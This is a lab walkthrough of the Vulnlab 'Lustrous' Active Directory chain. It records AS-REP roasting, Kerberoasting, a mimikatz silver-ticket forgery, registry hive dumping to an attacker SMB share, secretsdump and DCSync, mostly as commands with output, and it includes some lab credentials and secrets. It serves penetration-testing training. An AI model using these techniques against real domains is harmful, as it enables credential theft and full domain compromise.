Vulnlab - Lustrous (Chain) - Medium
Warning
I did this chain in two times, meaning that the IPs have changed during the Walktrhough. To make it clear :
- 10.10.202.181 = 10.10.220.69 = lusdc.lustrous.vl
- 10.10.202.182 = 10.10.220.70 = lusms.lustrous.vl
LusDC.lustrous.vl
Initial Access
Let’s begin, as always, with a nmap scan to see open ports and services that we can access :
exegol-chains /workspace $ nmap -sV -sC -p- -A --max-retries 1 -n 10.10.202.181 -T4
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after: 2022-12-26T00:00:00
|_http-title: Not Found
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-13T12:10:34+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-02-12T12:05:06
|_Not valid after: 2025-08-14T12:05:06
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSDC
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusDC.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-02-13T12:09:54+00:00
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
58639/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap arguments
-sV: is to retrieve the version of the services-sC: is to run basic nmap scripts-p-: is to scan all 65535 ports-A: is to detect OS scan and version--max-retries: is to tell nmap to only to 1 try on the port-n: is to not perform name resolution
Nmap show a ftp service, and Anonymous authentication seems to be allowed. Once connected, we can see few interesting potential users :
exegol-chains /workspace $ ftp anonymous@10.10.202.181
Connected to 10.10.202.181.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21 11:50AM <DIR> transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
226 Transfer complete.
There’s nothing interesting other than the fact we have 4 potential users. If we use Kerbrute, we can see that these users exists in the domain :
exegol-chains /workspace $ kerbrute userenum --domain lustrous.vl --dc 10.10.202.181 users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 02/13/25 - Ronnie Flathers @ropnop
2025/02/13 14:10:23 > Using KDC(s):
2025/02/13 14:10:23 > 10.10.202.181:88
2025/02/13 14:10:23 > [+] VALID USERNAME: tony.ward@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: wayne.taylor@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: rachel.parker@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: ben.cox@lustrous.vl
2025/02/13 14:10:23 > Done! Tested 4 usernames (4 valid) in 0.073 seconds
Since we have 4 users, we can try to see if Kerberos Pre-auth is activated or no, and if it’s not the case we would be able to retrieve the TGT of the user :
exegol-chains /workspace $ GetNPUsers.py lustrous.vl/ -usersfile users -dc-ip 10.10.202.181
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$ben.cox@LUSTROUS.VL:cbc83562991fc156bbd901e305a31d88$e0ee0b079806d1a9a7cf9d997bc9c307aa6001da1ee3724278442e368df4a1f9bbbead6616ab27e34<REDACTED>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
The TGT contains the hash of the user, so we can try to use hashcat to retrieve the plain text password :
exegol-chains /workspace $ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$krb5asrep$23$ben.cox@LUSTROUS.VL:cbc83562991fc156bbd901e305a31d88$e0ee0b079806d1a9a7cf9d997bc9c307aa6001da1ee3724278442e368df4a1f9bbbeaw<REDACTED>:<REDACTED>
Now, we can use NetExec to see if this credential is correct (users is a txt file where the 4 users are):
exegol-chains /workspace $ nxc smb 10.10.202.181 -u 'users' -p '<REDACTED>'
SMB 10.10.202.181 445 LUSDC [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.202.181 445 LUSDC [+] lustrous.vl\ben.cox:<REDACTED>
Lateral Movement
With an access to the domain, we can now retrieve all users to add them to our users’ wordlists. To do that I use NetExec and a little bit of awk :
exegol-chains /workspace $ nxc smb 10.10.202.181 -u 'users' -p '<REDACTED>' --users | awk {'print $5'}
[*]
[+]
-Username-
Administrator
Guest
krbtgt
Deborah.Harris
Duncan.Spencer
Brenda.Andrews
Rachel.Parker
Wayne.Taylor
Hugh.Wilkinson
Tracy.Roberts
Bradley.Hancock
Tony.Ward
Joanna.Hall
Marian.Elliott
Ben.Cox
Joanna.Harvey
Jeremy.Clark
Allan.Parker
Mitchell.Fuller
Colin.Dodd
Liam.Atkinson
Michelle.John
Iain.Evans
Donna.Collins
Cameron.Walsh
svc_web
svc_db
[*]
With a valid list of users, I tried to do Kerberoasting to see if some of them are service account, we can use GetUserSPNs.py :
exegol-chains /workspace $ GetUserSPNs.py -usersfile "users" -dc-host "10.10.202.181" "lustrous.vl"/ben.cox:<REDACTED>
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$LUSTROUS.VL$*krbtgt*$26509dc78563694e2daf82dd$9fe5f007fa0cdb030ad08c6015785c2e6c9b8035675ebc1af4cd562b9eda860c2825558651d8c976e2b15d27447b787fccee75639e18b1c4eaaf7bf0e2dc29c9f23ca8d25467f1924841f2a23e072c099570e7359594e2e57d8f67dd16e9e9dd6782f9006b02c12706f684af3f2700c3b484d4e10f2af95d0fadd21454db15caae9a19d79c5e3e7f633b4a523ae243c465d55de8467dd91e80e764095e7f5da83910ca8e81626aace8416678f052c28e10e2903489a7fa3796ec8fbec92d1f7f89412dff3f8d1913b7ee47247fefe353decbf186a1c35f685e965cbe648896b4becb184fffa8205f22b19c36f40e1c6830633ca97284acb8214b9a61fa825c30b5deff26375ff937f5f2ebb3a7f9cc73f34f6ca9500bbae01ec62632f327cb9073e1ff8ab8e6bba8a0a231588a857f3baadaac2de4392805272e30a0c406595d96ce3070a9659bee490f13ebebf4a1207280551c90651175f3c45c895660ca512bf1b3be0025744b017025284d46b7c82757cd8e91c15e8a56947d4b9bbb57e9d4e7fd0317a128daacc15bafd0d9c9603d17e5a250f852eba8804cd4c69f138655c47af2ad63dd50e6d146e18a380735d774e01b13b4a447ade6e05e8839cf40a8737b0e236f68281c6af6116beb2af44a37a8d9318d9ee17685fbb920a17146f4f5f84f56c4cdaff95a2883b92263557256f890e38a1c3c6a313f8dfe6da2a9419ebaf717ed8f624f8d8efd036d4bfc686b24553e4f541e6e9636fd39138d067b5713fc6b83baecda17eee6a9376b4fcc4982062604c8e4077c30b0930a33d47cfce17152b51fec4d50e76dec1622682250e3e8b221c9fe1c69663f9fa15b08f9cb292a27653983bef392aa6e9de43fba4efea841cf6464bdc7a9031ebf074e359681963a9e5b745b1cfabf5a7275308d6c3562b0b758ebcaef1a321615547b7f0759e2db83ae9941870a72bd83c552b30af8b2c6772ea53f70026b61c15381120b65f836c60951204c849e058585a7a2fdcc045f6e7243f4ce28ca9af6d909fc76af977e4866abcc1d84ff91b0e7ac8bb7d579bf49a283eb7707e5bfb634d7bad3f34e18584a315a14fc8328a75ec37e459ceca4d90acdbf9dff900e467270540cd3448c190229d0d7d70e4648e703ea49409cbf69853f341c1170f721a76abe768c496a888da10e7e290166f8200f9220d01bf56755fd139736d9b7ccac7ccf171f8c82c107442d660f0693d27fca6c1a821d68ae87e40fd8f19fef82a1c893c3814ef64c77557765d28bc6328d11d76eefe50ba17b373f469e701519f30cd632514999e3fe7442b654ebf43af44e47ec35ea105974590ebb7a46f51a3261d790a4ddf43892469f5216daceaa6a418d4d8c6938d18e1a952e46f43ca6e3e93ac5e65d3f51c83c1561ee098190822c892a54268a5b98e47a08824b6824369afb8a75731cdd3f7438804c502544360d7fd142878d4a3dee81141249f9506731c922473a3c035a814f69cf
[-] Principal: Deborah.Harris - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Duncan.Spencer - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Brenda.Andrews - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Rachel.Parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Wayne.Taylor - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Hugh.Wilkinson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Tracy.Roberts - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Bradley.Hancock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Tony.Ward - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joanna.Hall - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Marian.Elliott - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Ben.Cox - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joanna.Harvey - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Jeremy.Clark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Allan.Parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Mitchell.Fuller - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Colin.Dodd - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Liam.Atkinson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Michelle.John - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Iain.Evans - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Donna.Collins - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Cameron.Walsh - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*svc_web$LUSTROUS.VL$svc_web*$56cbf754a5730eb363576b389c527c7f$fa4864c90891f15aca3f48476939c0f38b74e3eb373da2bf55a47fcdacffa6a2c43afadbca4fac1d7333929a1fd47f4a252c7f2eea43ff0e646a1346e218498816b28cac<REDACTED>
$krb5tgs$23$*svc_db$LUSTROUS.VL$svc_db*$e877e2675c661f9d7b86992db97de8eb$782ef773f8070acf9f008007b21c1897da93949d741026f9785136635cae9e7c38b168369b081a0f6845587d118f911a110d43f6a38cf58078fd640d5f1647d88449164b<REDACTED>
Let’s try to use Hashcat to retrieve the plain text password :
exegol-chains /workspace $ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*svc_web$LUSTROUS.VL$svc_web*$56cbf754a5730eb363576b389c527c7f$fa4864c90891f15aca3f48476939c0f38b74e3eb373da2bf55a47fcdacffa6a2c43afadbca4fac1d7333929a1fd47f4a252c7f2eea43ff0e646a1346e218498816b28cacw<REDACTED>:<REDACTED>
Privilege Escalation
Now it’s the moment when I have to explain few things, because what I had to do was not a clear path for me.
So, we have the plain text password of the service account svc_web and during our enumeration of the DC, we found that there is a http service running.
If we curl the service, we can see through the header www-authenticate Kerberos is used :
exegol-chains /workspace $ curl -I https://lusdc.lustrous.vl -k
HTTP/2 401
cache-control: private
content-length: 1293
content-type: text/html
server: Microsoft-IIS/10.0
x-aspnet-version: 4.0.30319
www-authenticate: Negotiate // Here it means Kerberos is used
x-powered-by: ASP.NET
Kerberos is used to authenticate clients to the web server. Let’s try to authenticate with user ben.cox to see what we can find on this web application :
This web app seems to be a notes application, where the user has a note about his password (a nice way to not forget his password I guess 🤨).
Since the authentication is through Kerberos, it means the page contains information related to the user we use to authenticate ?
I hope you remember that we have in ou hands the plain text password of the service account that is used to run this app (I guess). It means we can do a silver ticket attack !
How is this possible ? During all the process of the Kerberos authentication, one of the last step is the TGS. It is the ticket that is used to access the service requested, which is encrypted with the hash of the service account.
If we can retrieve the hash of the service account, it means we can forge our own ticket, put anything we want into it, and encrypt it with the hash of the service account. We can put anything we want (not really anything, the format of the ticket has to be respected), so what prevent us to put any user, for example Administrator ? nothing.
First, let’s retrieve the hash of the service account with pypykatz :
exegol-chains /workspace $ pypykatz crypto nt iy<REDACTED>
e67af8b3<REDACTED>
With this hash we can now forge our ticket. To do that I connected through RDP to LusMS machine, and I used mimikatz :
PS C:\users\public> .\mimikatz.exe "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67a<REDACTED> /user:Administrator /id:500 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3d78<REDACTED> /user:Administrator /id:500 /ptt User : Administrator
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df<REDACTED> - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/13/2025 8:35:39 PM ; 2/11/2035 8:35:39 PM ; 2/11/2035 8:35:39 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
Mimikatz arguments
kerberos::golden: is used to perform Diamon/Silver/Golden ticket attack/sid: is the domain SID/domain: is the FQDN of the domain/target: is the KDC/service: is the service we want to use in our ticket/rc4: is the hash of the service account/user: is the user we want to use in our ticket/id: is the id of the user used previously/ptt: is to inject the ticket in the memory
Perfect, we have a kerberos ticket as Administrator@lustrous.vl for HTTP service, so we can authenticate to the web application, using Invoke-WebRequest :
PS C:\users\public> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - SNotes</title>
<link href="/Content/css?v=-ajo3J6QtgGZONnv3AZei244jm7A7pCtHShB7DstoFM1" rel="stylesheet"/>
<script src="/bundles/modernizr?v=inCVuEFe6J4Q07A0AcRsbJic_UE5MwpRMNGcOtk94TE1"></script>
<script src="/bundles/jquery?v=8Oos0avDZyPg-cbyVzvkIfERIE1DGSe3sRQdCSYrgEQ1"></script>
<script src="/bundles/bootstrap?v=M4Nk6kIOwMFflsEKET0iPL9i5YBqbzMzvUOrd8gyCnw1"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="/">Secure Notes</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li><a href="/Internal">Notes</a></li>
</ul>
</div>
</div>
</div>
<div class="container body-content">
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Administrator!</p>
<div class="table">
<table class="table table-bordered table-hover">
<thead>
<th>
id
</th>
<th>
Name
</th>
<th>
note
</th>
<th>
author
</th>
<th>
actions
</th>
</thead>
<tbody>
<tr>
<td>
1
</td>
<td>
Note
</td>
<td>
Guess we better don't use the administrator account for this..
</td>
<td>
lustrous_administrator
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/1">Delete</a>
</td>
</tr>
</tbody>
</table>
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
</div>
<hr />
<footer>
<p>© 2025 - SNotes</p>
</footer>
</div>
</body>
</html>
Unfortunately, the administrator don’t have a reminder about his password.
After few enumerations on different users, I found an interesting one which is tony.ward. He is member of Backup Admins, and this group is member of Backup Operators :
Let’s do the previous steps with mimikatz, but in this cas for the user tony.ward :
PS C:\users\public> .\mimikatz.exe "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3<REDACTED> /user:tony.ward /id:1114 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3d<REDACTED> /user:tony.ward /id:1114 /ptt
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5<REDACTED> - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/13/2025 8:43:49 PM ; 2/11/2035 8:43:49 PM ; 2/11/2035 8:43:49 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
If we use again Invoke-WebRequest, we see the plain text password of our user :
PS C:\users\public> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - SNotes</title>
<link href="/Content/css?v=-ajo3J6QtgGZONnv3AZei244jm7A7pCtHShB7DstoFM1" rel="stylesheet"/>
<script src="/bundles/modernizr?v=inCVuEFe6J4Q07A0AcRsbJic_UE5MwpRMNGcOtk94TE1"></script>
<script src="/bundles/jquery?v=8Oos0avDZyPg-cbyVzvkIfERIE1DGSe3sRQdCSYrgEQ1"></script>
<script src="/bundles/bootstrap?v=M4Nk6kIOwMFflsEKET0iPL9i5YBqbzMzvUOrd8gyCnw1"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="/">Secure Notes</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li><a href="/Internal">Notes</a></li>
</ul>
</div>
</div>
</div>
<div class="container body-content">
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<div class="table">
<table class="table table-bordered table-hover">
<thead>
<th>
id
</th>
<th>
Name
</th>
<th>
note
</th>
<th>
author
</th>
<th>
actions
</th>
</thead>
<tbody>
<tr>
<td>
4
</td>
<td>
Password Reminder
</td>
<td>
U_cP<REDACTED>
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/4">Delete</a>
</td>
</tr>
<tr>
<td>
5
</td>
<td>
Task
</td>
<td>
Create Domain Backups
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/5">Delete</a>
</td>
</tr>
</tbody>
</table>
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
</div>
<hr />
<footer>
<p>© 2025 - SNotes</p>
</footer>
</div>
</body>
</html>
I was not able to connect through RDP or anything else, so I decided to use reg.py from Impacket to dump SAM.
First, we need to open a smb server :
exegol-chains /workspace $ smbserver.py -smb2support EXEGOL .
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then, we can use reg.py to dump the registry key :
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SAM' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.242\EXEGOL\SAM.save
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SECURITY' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to \\10.8.2.242\EXEGOL\SECURITY.save
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SYSTEM' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SYSTEM to \\10.8.2.242\EXEGOL\SYSTEM.save
To retrieve the hash, we can use famous secretsdump.py, again from impacket :
exegol-chains sam $ secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b43<REDACTED>:1e10fc<REDACTED>:::
Guest:501:aad3b435b51404e<REDACTED>:31d6cfe<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:93227b3f06e6a5addc8108a00ebc8a39d272f2894fce2c8e185146f8213b6d82776c6bf898e72b97c80df58a5d61ea770ebb18f9bdd8204d38125488e8a9b07e5e9acc6957d61f164dc23fc371996cdfa6ac8a98ed0a2819cfc2235007bafe93c35cf0b9667a4540a45eab904c9d1ee2acfaa362780440c734ebc0b23f0a638dcb6356511b0df26e9ea866935119690d768e772c1fbfd549d76cec367122f7e40a6206d61a222ef5f431862b0b2b211022916dc14885f4cedb0aa31eed4b95ab71f7a39b391fbce8489479d14223c5aaabfd8d9d2a689db25551ac03a206089886191155230097b95d5fa3da3bb8d907
$MACHINE.ACC: aad3b435b51404eeaa<REDACTED>:bc9fe3e<REDACTED>
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
By using the computer account, we can perform a DCSync attack ! We are now owning the domain !
exegol-chains sam $ secretsdump -just-dc-user krbtgt -hashes :"bc9fe3e1c45<REDACTED>>" "lustrous.vl"/"lusdc$"@"10.10.220.69"
LusMS.lustrous.vl
Initial Access & Privilege Escalation
After having collected domain datas’ with Rusthound, and injected them in BloodHound, I found that the user ben.cox is member of Remote Access group. If we try to connect with this user through WinRM to LusMS machine, it is working :
exegol-chains /workspace $ nxc winrm 10.10.202.182 -u 'ben.cox' -p '<REDACTED>'
WINRM 10.10.202.182 5985 LUSMS [*] Windows Server 2022 Build 20348 (name:LUSMS) (domain:lustrous.vl)
WINRM 10.10.202.182 5985 LUSMS [+] lustrous.vl\ben.cox:Trinity1 (admin)
One connected to the machine through WinRM, we can see that there’s a file name admin.xml on the Desktop. Let’s download it with Evil-WinRM :
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> ls
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> download admin.xml
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\Users\ben.cox\Desktop\admin.xml to admin.xml
Info: Download successful!
The file seems to be a backup of a SecureString, used to encrypt a password to use it in powershell script for example. Here there is a nice article explaining how it works :
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002<REDACTED></SS>
</Props>
</Obj>
</Objs>
